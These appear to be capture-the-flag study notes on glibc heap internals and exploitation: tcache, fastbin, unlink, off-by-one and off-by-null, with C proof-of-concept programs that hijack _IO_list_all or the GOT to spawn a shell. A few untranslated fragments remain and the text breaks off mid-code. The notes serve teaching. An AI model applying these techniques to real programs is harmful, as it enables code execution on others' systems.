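  • Checks: p <= (uintptr_t) -size, address and size are aligned, and size is at least MINSIZE
  • do_check_inuse_chunk (check_inuse_chunk), as described in the malloc section
  • Check whether the chunk can go into tcache
    • if the chunk's key field equals tcache_key, the chunk may be a double free:
    • malloc walks the bin of that index, checking that the number of chunks is below 7 (mp_.tcache_count), that each entry is aligned, and that none of them is the chunk being freed
    • if the bin is not full, the chunk is placed at the head of the tcache bin, with tcache_key stored and the pointer encrypted
  • If the size is in fastbin range (the extra condition that the next chunk is not top_chunk only applies when TRIM_FASTBINS is enabled, which it is not by default)
    • check that the physically next chunk's size is greater than 2 * SIZE_SZ and less than av->system_mem
    • in the single-threaded case, if the head of the fastbin is the chunk being freed, abort with "double free or corruption (fasttop)"; otherwise insert the chunk at the head
    • also check that the index computed from the old head's size matches this list
  • Chunks not allocated by mmap go through a series of checks
    • take the arena lock first
    • the chunk being freed must not be the top chunk
    • if the arena is contiguous (sbrk-based), the next chunk must not lie beyond the end of the top chunk
    • the PREV_INUSE bit in the next chunk's size must mark the chunk being freed as in use
    • the next chunk's size must be at least 2*SIZE_SZ and less than av->system_mem
    • if the physically previous chunk is free, check that its size equals the prev_size of the chunk being freed, then merge backward
    • if the next chunk is not the top chunk: merge forward if it is free (unlinking it), otherwise clear its PREV_INUSE bit. Then check that the unsorted bin head and its first chunk are consistently linked, and insert the chunk at the head of the unsorted bin
    • if the next chunk is the top chunk, merge into it directly
  • Final steps
    • if the merged chunk is at least 0x10000 (FASTBIN_CONSOLIDATION_THRESHOLD) and the fastbins contain free chunks, call malloc_consolidate
    • if the top chunk is larger than the heap trim threshold, shrink the heap
    • release the arena lock if it was taken here
  • mmap-allocated chunks are handled separately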
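The tcache part of _int_free can be sketched as a toy model with a single bin. The sketch also shows that the duplicate scan runs only when e->key equals tcache_key, so a UAF write that clobbers the key lets the same chunk enter the bin twice. TcacheFreeModel is hypothetical and stands in for glibc 2.29+ behavior.

```python
TCACHE_FILL_COUNT = 7   # default mp_.tcache_count


class TcacheFreeModel:
    """Toy model of the tcache part of _int_free (glibc 2.29+), one bin only."""

    def __init__(self, tcache_key: int):
        self.tcache_key = tcache_key
        self.bin = []           # head at index 0
        self.key = {}           # chunk -> current value of its e->key field

    def free(self, chunk: int) -> str:
        # The bin is scanned for a duplicate only if e->key == tcache_key.
        if self.key.get(chunk) == self.tcache_key and chunk in self.bin:
            raise RuntimeError("free(): double free detected in tcache 2")
        if len(self.bin) < TCACHE_FILL_COUNT:
            self.key[chunk] = self.tcache_key   # tcache_put stores the key
            self.bin.insert(0, chunk)
            return "tcache"
        return "fastbin/unsorted"               # bin full: continue in _int_free
```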

Other versions

Version  malloc  free  Other
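  • Use cases:
    • malloc
      • large bin
      • walking the unsorted bin
      • taking a chunk from a bin larger than the bin of the requested size
    • free
      • backward consolidation (merging with the physically adjacent free chunk at the lower address)
      • forward consolidation (except with the top chunk)
    • malloc_consolidate
      • free
    • realloc
      • forward expansion (except into the top chunk)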

malloc_consolidate

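  • Triggers:
    • _int_malloc: a largebin-sized request is being served, or no bin has a suitable chunk and the top chunk is too small for the request
    • _int_free: the (merged) chunk is at least FASTBIN_CONSOLIDATION_THRESHOLD (65536)
    • malloc_trim: always calls it
    • int_mallinfo
    • mallopt: always calls it
  • _int_malloc (large request)
    • fastbin chunks adjacent to the top chunk
    • fastbin chunks not adjacent to the top chunk
    • physically adjacent fastbin chunks are merged (even if their sizes differ)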

heap_info

#define HEAP_MIN_SIZE (32 * 1024) 
#ifndef HEAP_MAX_SIZE
# ifdef DEFAULT_MMAP_THRESHOLD_MAX
# define HEAP_MAX_SIZE (2 * DEFAULT_MMAP_THRESHOLD_MAX)
# else
# define HEAP_MAX_SIZE (1024 * 1024) /* must be a power of two */
# endif
#endif
/* HEAP_MIN_SIZE and HEAP_MAX_SIZE limit the size of mmap()ed heaps that are dynamically created for multi-threaded programs. The maximum size must be a power of two, for fast determination of which heap belongs to a chunk. It should be much larger than the mmap threshold, so that requests with a size just below that threshold can be fulfilled without creating too many heaps. */
/***************************************************************************/
/* A heap is a single contiguous memory region holding (coalesceable) malloc_chunks. It is allocated with mmap() and always starts at an address aligned to HEAP_MAX_SIZE. */
typedef struct _heap_info
{
mstate ar_ptr; /* Arena for this heap. */
struct _heap_info *prev; /* Previous heap. */
size_t size; /* Current size in bytes. */
size_t mprotect_size; /* Size in bytes that has been mprotected PROT_READ|PROT_WRITE. */
/* Make sure the following data is properly aligned, particularly that sizeof (heap_info) + 2 * SIZE_SZ is a multiple of MALLOC_ALIGNMENT. */
char pad[-6 * SIZE_SZ & MALLOC_ALIGN_MASK];
} heap_info;
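The comment above says that a non-main heap always starts at an address aligned to HEAP_MAX_SIZE. The owning heap_info can therefore be found by masking the chunk address, and the arena is then read from heap_info->ar_ptr. This sketch assumes the compile-time 64-bit default, where DEFAULT_MMAP_THRESHOLD_MAX is 4 MiB * sizeof(long) and HEAP_MAX_SIZE is 64 MiB. heap_for_ptr mirrors the glibc macro name.

```python
DEFAULT_MMAP_THRESHOLD_MAX = 4 * 1024 * 1024 * 8   # 64-bit: 4 MiB * sizeof(long)
HEAP_MAX_SIZE = 2 * DEFAULT_MMAP_THRESHOLD_MAX     # 64 MiB, a power of two


def heap_for_ptr(ptr: int) -> int:
    """Start of the heap_info that owns a chunk of a non-main arena."""
    return ptr & ~(HEAP_MAX_SIZE - 1)
```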

Arbitrary R/W/X

UAF

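Operating on a freed chunk is extremely dangerous. A freed chunk stores allocator pointers, and if they are modified, the allocator loses control of its lists and malloc may return abnormal pointers.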

Chunks are normally manipulated through pointers. Typical challenges record, write to, and free the pointers returned by malloc.

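Menu-style challenges usually keep heap pointers and let the user operate on them. The designer expects add -> edit -> delete, but a malicious add -> delete -> edit is just as legal to the program if the stored pointer is not cleared, because the ELF itself does not record whether a chunk has been freed. The damage to heap management can be devastating, ranging from a crash to full control of the program.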

In short, a freed chunk can still be operated on.

This usually happens because a global pointer is not set to NULL.

  • Vulnerability: ptr=NULL is missing after free(ptr)

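Control of fd and bk lets us forge a fake chunk on the corresponding bin list. As long as the fake chunk looks legitimate, malloc hands it out from that bin and returns a pointer to it for the user to operate on.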

For example:

free(chunk)							// fastbin[] -> chunk
edit(chunk->fd = target_addr) // fastbin[] -> chunk -> fake_chunk
target[0] = 0 // legalize fake_chunk
target[1] = fake_size
malloc(chunk)
malloc(target)
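For the fastbin version above, "legalizing" the fake chunk means that its size has to map to the same fastbin index. The flag bits and the low nibble are ignored, which is why a stray 0x7f byte can pass for a 0x70 fastbin. This is a sketch of that single check from _int_malloc, assuming 64-bit. On 2.32+, the fd written in the edit step must also be PROTECT_PTR-encoded.

```python
SIZE_BITS = 0x7


def fastbin_index(sz: int) -> int:
    return (sz >> 4) - 2


def fake_size_ok(fake_size_field: int, chunk_size: int) -> bool:
    """_int_malloc: fastbin_index(chunksize(victim)) must match the bin index."""
    return fastbin_index(fake_size_field & ~SIZE_BITS) == fastbin_index(chunk_size)
```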

double free

A double free puts the same chunk into a bin twice.

It is useful when the pointer cannot be modified after free (for example, when there is no edit function).

When the first copy of the chunk is allocated and modified, the copy that is still in the bin changes too, which lets us steer later allocations.

In effect, this is also a UAF.

# here free(chunk1) simply means freeing chunk1; the notation is only for convenience
free(chunk1) // fastbin[] -> chunk1
free(chunk2) // fastbin[] -> chunk2 -> chunk1
free(chunk1) // fastbin[] -> chunk1 -> chunk2 -> chunk1

malloc(chunk1) // fastbin[] -> chunk2 -> chunk1
edit(chunk1->fd = target_addr) // fastbin[] -> chunk2 -> chunk1 -> target_addr
malloc(chunk2)
malloc(chunk1)
malloc(target_addr)
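The trace above can be replayed with a toy fastbin in which each chunk's fd is an entry in a dict. This is a sketch: the addresses are hypothetical, and the model omits the size check that a real fake chunk must pass.

```python
class ToyFastbin:
    """One fastbin modelled as a head pointer plus a dict chunk -> fd."""

    def __init__(self):
        self.head = None
        self.fd = {}

    def free(self, chunk):
        if chunk == self.head:                       # the fasttop check
            raise RuntimeError("double free or corruption (fasttop)")
        self.fd[chunk] = self.head                   # chunk->fd = old head
        self.head = chunk

    def malloc(self):
        victim = self.head
        if victim is not None:
            self.head = self.fd.get(victim)          # follow victim->fd
        return victim
```

Freeing chunk1, chunk2, chunk1 and then overwriting chunk1's fd after the first malloc makes the fourth malloc return the target address.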

When there is no UAF, an overflow can forge chunks to obtain one.

  • Vulnerabilities: off by ..., heap overflow

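The idea of unlink is to use two adjacent chunks. Forge a chunk that looks already freed inside the lower chunk, then free the higher chunk (it must go to the unsorted bin). The higher chunk consolidates with the fake chunk, and the result goes into the unsorted bin. Through the original lower chunk we can then control the prev_size, size, fd, bk, etc. of the merged chunk (overlapping chunks).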

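Forging the chunk first requires knowing an address where a pointer to it is stored: a global variable, a leftover pointer, or an address built from input.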

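In the lower chunk, control the fake chunk's size, fd and bk. size must make the fake chunk end exactly where the higher chunk begins. fd is set to (the address where the fake chunk's address is stored) - 0x18, and bk to that same address - 0x10.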

In the higher chunk, control prev_size and size: set prev_size equal to the fake chunk's size, and clear the PREV_INUSE bit of size.

After consolidation, the location that stored the fake chunk's address holds that location minus 0x18, i.e. the forged fd.

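Suppose Full RELRO is not enabled, the modified pointer is a global variable, and an edit function exists. Editing through the global pointer then treats fd (&ptr - 0x18) as the chunk address. First overwrite the global with a GOT address (b'a'*0x18+p64(got)). The GOT entry is then treated as the chunk address, and a second edit overwrites the GOT.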

malloc(chunk1)
malloc(chunk2)
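edit(chunk1->fd = 0)                            # fake prev_size
edit(chunk1->bk = (chunk1_size-0x10)|1)         # fake size: the fake chunk ends at chunk2
edit(chunk1->bk+0x8 = chunk1_ptr_addr-0x18)     # fake fd
edit(chunk1->bk+0x10 = chunk1_ptr_addr-0x10)    # fake bk
edit(chunk2->prev_size = chunk1_size-0x10)      # must equal the fake size
edit(chunk2->size = chunk2_size & ~1)           # clear PREV_INUSE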
free(chunk2)

#pre_chunk1->bk+0x8 = chunk1->bk+0x10 = main_arena+...
#chunk1->chunk1_ptr_addr-0x18
edit(chunk1_ptr_addr = got) #leak libc
...
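The effect of unlink on the global pointer can be replayed on a toy memory (a dict from address to qword). The following is a sketch of glibc's unlink_chunk checks and writes, without the largebin nextsize handling. The addresses G and P are hypothetical.

```python
def unlink_chunk(mem: dict, p: int) -> None:
    """Sketch of unlink_chunk on a toy 64-bit memory (addr -> qword)."""
    size = mem[p + 0x8] & ~0x7
    if size != mem[p + size]:                        # next chunk's prev_size
        raise RuntimeError("corrupted size vs. prev_size")
    fd, bk = mem[p + 0x10], mem[p + 0x18]
    if mem[fd + 0x18] != p or mem[bk + 0x10] != p:   # FD->bk, BK->fd
        raise RuntimeError("corrupted double-linked list")
    mem[fd + 0x18] = bk                              # FD->bk = BK
    mem[bk + 0x10] = fd                              # BK->fd = FD


G = 0x404060     # hypothetical address of the global pointer
P = 0x4052a0     # hypothetical fake chunk, the value stored at G
```

With fd = G - 0x18 and bk = G - 0x10, both link checks read the global itself. After the two writes, the global holds G - 0x18.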

For example, using a global variable:

// glibc-2.39 : gcc -g -o ./1 ./1.c -z lazy
#include <stdio.h>
#include <stdlib.h>

long long *p,*p_copy;

int main(){
setvbuf(stdin,0,2,0);
setvbuf(stdout,0,2,0);
setvbuf(stderr,0,2,0);
char* n[8];
for(int i=0;i<7;i++){
n[i] = (char*)malloc(0x90);
}
p = (long long *)malloc(0x40);
p_copy=p;
n[7] = (char*)malloc(0x90);
malloc(0x10);

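p[0]=0;                            // fake chunk: prev_size
p[1]=0x41;                         // fake chunk: size 0x40, ends at n[7]'s header
p[2]=(long long)&p-0x18;           // fake fd: fd->bk is p itself
p[3]=(long long)&p-0x10;           // fake bk: bk->fd is p itself
p[8]=0x40;                         // n[7]'s prev_size = fake chunk size
p[9]=0xa0;                         // n[7]'s size with PREV_INUSE cleared
for(int i=0;i<7;i++){
free(n[i]);                        // fill the 0xa0 tcache bin
}
free(n[7]);                        // backward consolidation unlinks the fake chunk: p = &p - 0x18

p[3]=(long long)&p_copy-0x78;      // p[3] aliases p: redirect p (offset specific to this build)
long long libc=(long long)p[3]-0x2fe00;   // read a libc pointer there (offset specific to this libc)
p[0]=libc;                         // write the computed address to the target (layout-specific)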

char *attack=(char*)malloc(0x100);
attack[0]='/';
attack[1]='b';
attack[2]='i';
attack[3]='n';
attack[4]='/';
attack[5]='s';
attack[6]='h';
free(attack);

return 0;
}

Or, under Full RELRO, combine it with other techniques (smallbin reverse into tcache, house of apple2):

// glibc-2.39 : gcc -g -o ./1 ./1.c

#include <stdio.h>
#include <stdlib.h>

long long *p,*p_copy;

int main(){
setvbuf(stdin,0,2,0);
setvbuf(stdout,0,2,0);
setvbuf(stderr,0,2,0);
char* n[8];
for(int i=0;i<7;i++){
n[i] = (char*)malloc(0x90);
}
p = (long long *)malloc(0x40);
p_copy=p;
n[7] = (char*)malloc(0x90);
malloc(0x10);

p[0]=0;
p[1]=0x41;
p[2]=(long long)&p-0x18;
p[3]=(long long)&p-0x10;
p[8]=0x40;
p[9]=0xa0;
for(int i=0;i<7;i++){
free(n[i]);
}
free(n[7]);

p=p_copy;
malloc(0x100);

long long libc=(long long)p[3];
p[1]=0xe1;
p[2]=(long long)n[7]-0x50;
p[3]=(long long)n[7]-0x30;
p[4]=0;
p[5]=0xe1;
p[6]=(long long)n[7]-0x50;
p[7]=(long long)n[7]-0x10;
p[8]=0;
p[9]=0xe1;
p[10]=(long long)n[7]-0x30;
p[11]=libc;
malloc(0xd0);

*(long long*)n[7]=(libc+0xaa0-0xd0)^(((long long)n[7])>>12);
malloc(0xd0);

long long* attack=(long long*)malloc(0xd0);
attack[0]=0x3b687320;
attack[1]=(libc+0xaa0)-0x10-0xd0;
attack[2]=0;
attack[3]=0;
attack[4]=0;
attack[5]=libc-0x1ab3d0-0xd0;
attack[6]=0;
attack[7]=0;
attack[8]=0;
attack[9]=0;
attack[10]=0;
attack[11]=0;
attack[12]=0;
attack[13]=0;
attack[14]=0;
attack[15]=0;
attack[16]=0;
attack[17]=(long long)(n[1]+0x10);
attack[18]=0;
attack[19]=0;
attack[20]=(libc+0xaa0)-0x40-0xd0;
attack[21]=0;
attack[22]=0;
attack[23]=0;
attack[24]=0;
attack[25]=0;
attack[26]=0;
attack[27]=libc-0x18f8-0x20-0xd0;

puts("Hello, world!");
return 0;
}

Off by …

Off by one and off by null are the classic off by ... bugs.

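If the request size can be made to look like 0x...8, the chunk reuses the next chunk's prev_size field as its own space. The off by ... overflow then reaches the size field of the physically next chunk, which produces overlapping chunks and therefore a UAF.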

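In general, off by one either overwrites the size of an allocated chunk to create overlap, or overwrites the size of a free chunk in the unsorted bin so that a larger allocation overlaps its neighbors. Off by null is mostly used together with unlink.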
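The offset arithmetic behind the 0x...8 trick can be sketched as follows, assuming a 64-bit build. next_size_offset and overwrite_low_byte are hypothetical helpers. For malloc(0x418), index 0x418 (one byte past the end) is exactly the low byte of the next chunk's size. This matches heap[0][0x418]='\xe1' in the example below, which turns 0x421 into 0x4e1.

```python
SIZE_SZ = 8
MALLOC_ALIGN_MASK = 0xf
MINSIZE = 0x20


def request2size(req: int) -> int:
    if req + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE:
        return MINSIZE
    return (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK


def next_size_offset(req: int) -> int:
    """Offset from malloc(req)'s pointer to the next chunk's size field."""
    # user ptr = chunk + 0x10, next size field = chunk + chunksize + 0x8
    return request2size(req) - SIZE_SZ


def overwrite_low_byte(size_field: int, byte: int) -> int:
    """Effect of a one-byte overflow on a little-endian size field."""
    return (size_field & ~0xff) | byte
```

For malloc(0x50), by contrast, the next size field sits at offset 0x58. A one-byte overflow at index 0x50 only reaches the next chunk's prev_size.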

off by one

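Overwriting size creates overlapping chunks. With overlap in the unsorted bin, splitting the large free chunk leaves libc addresses (fd/bk) inside the overlapped chunk, where they can be read. Overwriting tcache, fastbin or smallbin pointers gives allocation at arbitrary addresses, and so on.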

// glibc-2.39 gcc -g -o ./1 ./1.c

#include <stdio.h>
#include <stdlib.h>

char *heap[8];

int main() {
setvbuf(stdin,0,2,0);
setvbuf(stdout,0,2,0);

heap[0]=malloc(0x418);
heap[1]=malloc(0x418);
heap[2]=malloc(0x58);
heap[3]=malloc(0x58);
heap[4]=malloc(0x418);
heap[5]=malloc(0x418);
heap[0][0x418]='\xe1';

free(heap[1]);
heap[1]=NULL;

heap[1]=malloc(0x418);
printf("leak:%llx\n",((long long*)heap[2])[0]);
long long libc_base=((long long*)heap[2])[0]-0x203b20;
printf("libc:%llx\n",libc_base);

free(heap[1]);
heap[1]=NULL;

heap[2][0x58]='\xc1';
heap[4][0x58]='\xd1';
heap[4][0x59]='\x03';

free(heap[3]);
heap[3]=NULL;
free(heap[2]);
heap[2]=NULL;

heap[2]=malloc(0x4d0);
printf("leak:%llx\n",((long long*)heap[2])[144]);
long long heap_base=((long long*)heap[2])[144]<<12;
printf("heap:%llx\n",heap_base);

((long long*)heap[2])[132]=(libc_base+0x2044c0)^((heap_base+0xae0)>>12); // _IO_list_all
malloc(0xb0);

long long *attack=(long long*)malloc(0x100);
attack[0]=0x3b687320; // " sh;"
attack[5]=libc_base+0x58750; // system
attack[17]=(long long)heap[0]+0x20; // prot:w
attack[20]=(long long)attack-0x10;
attack[26]=(long long)attack-0x40;
attack[27]=libc_base+0x202228; // _IO_wfile_jumps

long long *p = (long long*)malloc(0xb0);
p[0]=(long long)attack;

puts("[+]attack");
exit(0);
return 0;
}

off by null

Before 2.29

prev_size controllable

low address  ---------------------- >  high address
chunk1 | ... | chunk0 | chunk | top

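Make the size of chunk (the chunk right after chunk0) look like 0x...01. Use the off by null from chunk0 to set chunk's prev_size to the total size of any number of chunks before it (chunk1 ... chunk0), and to turn its size into 0x...00, which clears PREV_INUSE without changing the size. chunk1 must already be free (for example, in the unsorted bin) so that its fd/bk pass unlink. Then free chunk to trigger the backward consolidation, making sure it does not go into tcache.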
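The two values planted by the null byte can be computed as follows. off_by_null_plan is a hypothetical helper, and the chunk sizes in the usage example are illustrative. The size check shows why the victim's size must end in 0x01: otherwise the NUL byte would change the size as well as clear PREV_INUSE.

```python
def off_by_null_plan(sizes_chunk1_to_chunk0, victim_size_field):
    """Return (prev_size to write, victim size after the NUL byte)."""
    if (victim_size_field & 0xff) != 0x01:
        # the NUL byte must clear only PREV_INUSE, not change the size
        raise ValueError("victim size must look like 0x...01")
    new_size_field = victim_size_field & ~0xff
    prev_size = sum(sizes_chunk1_to_chunk0)   # distance back to chunk1
    return prev_size, new_size_field
```

For example, with chunks of 0x90, 0x20 and 0x70 before a 0x101 victim, the plan is prev_size 0x120 and size 0x100.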

prev_size not controllable

low address  ---------------------- >  high address
chunk1 | chunk2 | chunk3 | top

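Free chunk2 so that chunk3's prev_size keeps chunk2's size. Then use the off by null from chunk1 to shrink chunk2's size, and split chunk2 into several chunks (chunk_2_1, chunk_2_2, chunk_2_3). Free chunk_2_1 and then chunk3. Because chunk3's prev_size still holds chunk2's old size, chunk3 consolidates backward over all of chunk2, and since chunk3 borders the top chunk, everything is merged into top while chunk_2_2 is still allocated.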

This requires chunk2 … last_remainder.

2.29+

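Check added in 2.29 (backward consolidation in _int_free; malloc_consolidate has an equivalent check):

/* consolidate backward */
if (__glibc_unlikely (chunksize(p) != prevsize))
malloc_printerr ("corrupted size vs. prev_size while consolidating");

unlink_chunk additionally checks:

if (chunksize (p) != prev_size (next_chunk (p)))
malloc_printerr ("corrupted size vs. prev_size");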

Method 1

This method only uses chunks no larger than 0xf0, but it needs many allocations to fill tcache. All chunk sizes below include the header, unlike the sizes passed to malloc.

Note: the chunks below are allocated starting at 0x…3a0.

  1. First allocate 7 chunks each of sizes 0x90, 0xa0, 0xb0, 0xc0, 0xd0, 0xe0 and 0xf0, 49 chunks in total (used to fill tcache), then some functional chunks. The layout is:
0x90 * 7	0~6
0xa0 * 7 7~13
0xb0 * 7 14~20
0xc0 * 7 21~27
0xd0 * 7 28~34
0xe0 * 7 35~41
0xf0 * 7 42~48
0xa0 49
0xa0 50
0x20 51
0xb0 52
0xc0 53
0xe0 54
0xe0 55
0xf0 56
0xf0 57
0xa0 58
0xf0 59
0x20 60
  2. Forge a 0xe0-sized chunk in the middle of chunk 56 (offsets from chunk 56's header):
0x0 : 0
0x8 : 0xf0
0x10: 0x200
0x18: 0xe0
  3. Fill some tcache bins so that the chunks freed next go into the unsorted bin and consolidate
free 0~6	0x90
free 14~20 0xb0
free 21~27 0xc0
free 35~41 0xe0
free 42~48 0xf0
  4. Create one large unsorted chunk of 0x420 in total
free 52~56		0xb0 + 0xc0 + 0xe0 + 0xe0 + 0xf0 = 0x420
  5. Take the chunks back out of tcache (here "malloc 1" means allocating chunk 1 again)
malloc 0~6		0x90
malloc 14~20 0xb0
malloc 21~27 0xc0
malloc 35~41 0xe0
malloc 42~48 0xf0
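  6. Move the unsorted chunk into a largebin, then allocate 0xa0, 0xa0 (off by null), 0x90, 0x90 and 0xe0. During the second 0xa0 allocation, the off by null changes the size of the remaining chunk from 0x420-0xa0-0xa0=0x2e0 to 0x200, which is exactly 0x90+0x90+0xe0=0x200. Together with step 2 this forges a fake free chunk, and it also keeps the prev_size of chunk 57 at 0x2e0. The layout is now: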
0x90 * 7	0~6
0xa0 * 7 7~13
0xb0 * 7 14~20
0xc0 * 7 21~27
0xd0 * 7 28~34
0xe0 * 7 35~41
0xf0 * 7 42~48
0xa0 49
0xa0 50
0x20 51
0xa0 52
0xa0 53
0x90 54
0x90 55
0xe0 56
0xe0 fragment
0xf0 57(prev_size = 0x2e0)
0xa0 58
0xf0 59
0x20 60
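  7. Leave forged fd and bk in chunk 54 so that it passes the unlink check, because the prev_size of the chunk that will be freed leads exactly to chunk 54. Use the unsorted bin list to leave heap addresses: free three non-adjacent chunks, with chunk 54 freed second, so that its fd and bk both point to chunks.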
unsortedbin
all: 0x55555555bf70 —▸ 0x55555555bb00 —▸ 0x55555555b900 —▸ 0x7ffff7fb4d00 (main_arena+96) ◂— 0x55555555bf70

// here 0x55555555bb00 is chunk 54

pwndbg> tele 0x55555555bb00
00:0000│ 0x55555555bb00 ◂— 0
01:0008│ 0x55555555bb08 ◂— 0x91
02:0010│ 0x55555555bb10 —▸ 0x55555555b900 ◂— 0
03:0018│ 0x55555555bb18 —▸ 0x55555555bf70 ◂— 0

The concrete steps are:

free 0~6
free 7~13
free 42~48
free 50
free 54
free 59
free 53
  8. Take the chunks back out of tcache
malloc 0~6		0x90
malloc 7~13 0xa0
malloc 42~48 0xf0
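  9. Move them into smallbins by requesting a size not present in the unsorted bin (the unsorted chunks are now 0x130, 0xf0 and 0xa0). malloc(0xd8) moves all unsorted chunks into smallbins. 0xf0 is the closest size, and the remainder after splitting would be below the minimum chunk size, so the whole 0xf0 chunk is returned to us, which is effectively "malloc 59". To protect the pointers we left behind, split the 0x130 chunk produced by consolidation (0xa0+0x90) into 0xc0+0x70, so that fd and bk sit at the end of the 0xc0 chunk.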
malloc 59
malloc(0xb8)

The heap layout is now:

0x90 * 7	0~6
0xa0 * 7 7~13
0xb0 * 7 14~20
0xc0 * 7 21~27
0xd0 * 7 28~34
0xe0 * 7 35~41
0xf0 * 7 42~48
0xa0 49
0xa0 50(smallbins)
0x20 51
0xa0 52
0xc0 53
0x70 54(unsortedbin)
0x90 55
0xe0 56
0xe0 fragment
0xf0 57(prev_size = 0x2e0)
0xa0 58
0xf0 59
0x20 60

Then extend chunk 54 in the unsorted bin: free 55 to form a 0x100 chunk, and re-split it from 0x70+0x90 into 0xc0+0x40.

free 0~6
free 55
malloc 0~6
malloc(0xb8)
malloc 50
malloc(0x38)

The heap layout is now:

0x90 * 7	0~6
0xa0 * 7 7~13
0xb0 * 7 14~20
0xc0 * 7 21~27
0xd0 * 7 28~34
0xe0 * 7 35~41
0xf0 * 7 42~48
0xa0 49
0xa0 50
0x20 51
0xa0 52
0xc0 53
0xc0 54
0x40 55
0xe0 56
0xe0 fragment
0xf0 57(prev_size = 0x2e0)
0xa0 58
0xf0 59
0x20 60
  10. Forge bk->fd == P
free 7~13
free 21~27
free 42~48
free 50
free 54
free 59
free 58

At this point:

unsortedbin
all: 0x55555555bed0 —▸ 0x55555555bb20 —▸ 0x55555555b900 —▸ 0x7ffff7fb4d00 (main_arena+96) ◂— 0x55555555bed0

pwndbg> tele 0x55555555bb00
00:0000│ 0x55555555bb00 ◂— 0
01:0008│ 0x55555555bb08 ◂— 0x91
02:0010│ 0x55555555bb10 —▸ 0x55555555b900 ◂— 0
03:0018│ 0x55555555bb18 —▸ 0x55555555bf70 ◂— 0
04:0020│ 0x55555555bb20 ◂— 0
05:0028│ 0x55555555bb28 ◂— 0xc1 // 54
06:0030│ 0x55555555bb30 —▸ 0x55555555b900 ◂— 0
07:0038│ 0x55555555bb38 —▸ 0x55555555bed0 ◂— 0

pwndbg> tele 0x55555555bed0
00:0000│ 0x55555555bed0 ◂— 0 // 58
01:0008│ 0x55555555bed8 ◂— 0x191
02:0010│ 0x55555555bee0 —▸ 0x55555555bb20 ◂— 0
03:0018│ 0x55555555bee8 —▸ 0x7ffff7fb4d00 (main_arena+96) —▸ 0x55555555c080 ◂— 0
04:0020│ 0x55555555bef0 ◂— 0
... ↓ 3 skipped
pwndbg>
08:0040│ 0x55555555bf10 ◂— 0
... ↓ 7 skipped
pwndbg>
10:0080│ 0x55555555bf50 ◂— 0 // 59
... ↓ 4 skipped
15:00a8│ 0x55555555bf78 ◂— 0xf1
16:00b0│ 0x55555555bf80 —▸ 0x55555555bb20 ◂— 0
17:00b8│ 0x55555555bf88 —▸ 0x7ffff7fb4d00 (main_arena+96) —▸ 0x55555555c080 ◂— 0

Now an off by null on the pointer stored in chunk 59 (its fd 0x55555555bb20, at 0x55555555bf80) is enough to make bk->fd == P.

  11. Restore first, and re-split the chunk formed by 58 and 59 (0xa0+0xf0) into 0xd0+0xc0
malloc 7~13
malloc 21~27
malloc 42~48
malloc(0xc8)
malloc 54
malloc(0xb8)
malloc 50

Then allocate 0xa0, 0xa0 and 0x20 chunks from the top chunk.

The heap layout is now:

0x90 * 7	0~6
0xa0 * 7 7~13
0xb0 * 7 14~20
0xc0 * 7 21~27
0xd0 * 7 28~34
0xe0 * 7 35~41
0xf0 * 7 42~48
0xa0 49
0xa0 50
0x20 51
0xa0 52
0xc0 53
0xc0 54
0x40 55
0xe0 56
0xe0 fragment
0xf0 57(prev_size = 0x2e0)
0xd0 58
0xc0 59
0x20 60
0xa0 61
0xa0 62
0x20 63
  12. Next, make fd->bk == P
free 7~13
free 21~27
free 62
free 50
free 54
free 49

Similarly:

unsortedbin
all: 0x55555555b860 —▸ 0x55555555bb20 —▸ 0x55555555c120 —▸ 0x7ffff7fb4d00 (main_arena+96) ◂— 0x55555555b860

pwndbg> tele 0x55555555bb00
00:0000│ 0x55555555bb00 ◂— 0
01:0008│ 0x55555555bb08 ◂— 0x91
02:0010│ 0x55555555bb10 —▸ 0x55555555b900 ◂— 0
03:0018│ 0x55555555bb18 —▸ 0x55555555bf70 ◂— 0
04:0020│ 0x55555555bb20 ◂— 0
05:0028│ 0x55555555bb28 ◂— 0xc1 // 54
06:0030│ 0x55555555bb30 —▸ 0x55555555c120 ◂— 0
07:0038│ 0x55555555bb38 —▸ 0x55555555b860 ◂— 0

pwndbg> tele 0x55555555b860
00:0000│ 0x55555555b860 ◂— 0
01:0008│ 0x55555555b868 ◂— 0x141 // 49
02:0010│ 0x55555555b870 —▸ 0x55555555bb20 ◂— 0
03:0018│ 0x55555555b878 —▸ 0x7ffff7fb4d00 (main_arena+96) —▸ 0x55555555c1e0 ◂— 0
04:0020│ 0x55555555b880 ◂— 0
... ↓ 15 skipped
15:00a8│ 0x55555555b908 ◂— 0xa1 // 50
16:00b0│ 0x55555555b910 —▸ 0x55555555c120 ◂— 0
17:00b8│ 0x55555555b918 —▸ 0x55555555bb20 ◂— 0

Restore the heap in the same way:

malloc 7~13
malloc 21~27
malloc 54
malloc 62
malloc(0xc8)
malloc(0x68)

49、500xa0+0xa0切割为0xd0+0x70

现在的布局是

0x90 * 7	0~6
0xa0 * 7 7~13
0xb0 * 7 14~20
0xc0 * 7 21~27
0xd0 * 7 28~34
0xe0 * 7 35~41
0xf0 * 7 42~48
0xd0 49
0x70 50
0x20 51
0xa0 52
0xc0 53
0xc0 54
0x40 55
0xe0 56
0xe0 (fragment)
0xf0 57(prev_size = 0x2e0)
0xd0 58
0xc0 59
0x20 60
0xa0 61
0xa0 62
0x20 63

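An off-by-null from chunks 49 and 58 (at user-data offsets 0xa8 and 0xa0 respectively) then satisfies the unlink pointer checks.

  3. Finally, forge a fake size in chunk 53 to pass the size check, fill the tcache, and then trigger the unlink: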
pwndbg> bins
tcachebins
0xf0 [ 7]: 0x55555555b1e0 —▸ 0x55555555b2d0 —▸ 0x55555555b3c0 —▸ 0x55555555b4b0 —▸ 0x55555555b5a0 —▸ 0x55555555b690 —▸ 0x55555555b780 ◂— 0
fastbins
empty
unsortedbin
all: 0x55555555bb00 —▸ 0x7ffff7fb4d00 (main_arena+96) ◂— 0x55555555bb00
smallbins
empty
largebins
empty
pwndbg> tele 0x55555555bb00
00:0000│ 0x55555555bb00 ◂— 0
01:0008│ 0x55555555bb08 ◂— 0x3d1
02:0010│ 0x55555555bb10 —▸ 0x7ffff7fb4d00 (main_arena+96) —▸ 0x55555555c1e0 ◂— 0
03:0018│ 0x55555555bb18 —▸ 0x7ffff7fb4d00 (main_arena+96) —▸ 0x55555555c1e0 ◂— 0
04:0020│ 0x55555555bb20 ◂— 0
05:0028│ 0x55555555bb28 ◂— 0xc1
06:0030│ 0x55555555bb30 ◂— 0x55555555b
07:0038│ 0x55555555bb38 ◂— 0

For debugging, the following program reproduces the whole sequence:

#include <stdio.h>
#include <stdlib.h>

long long* arr[64];
void free_o(int i) {
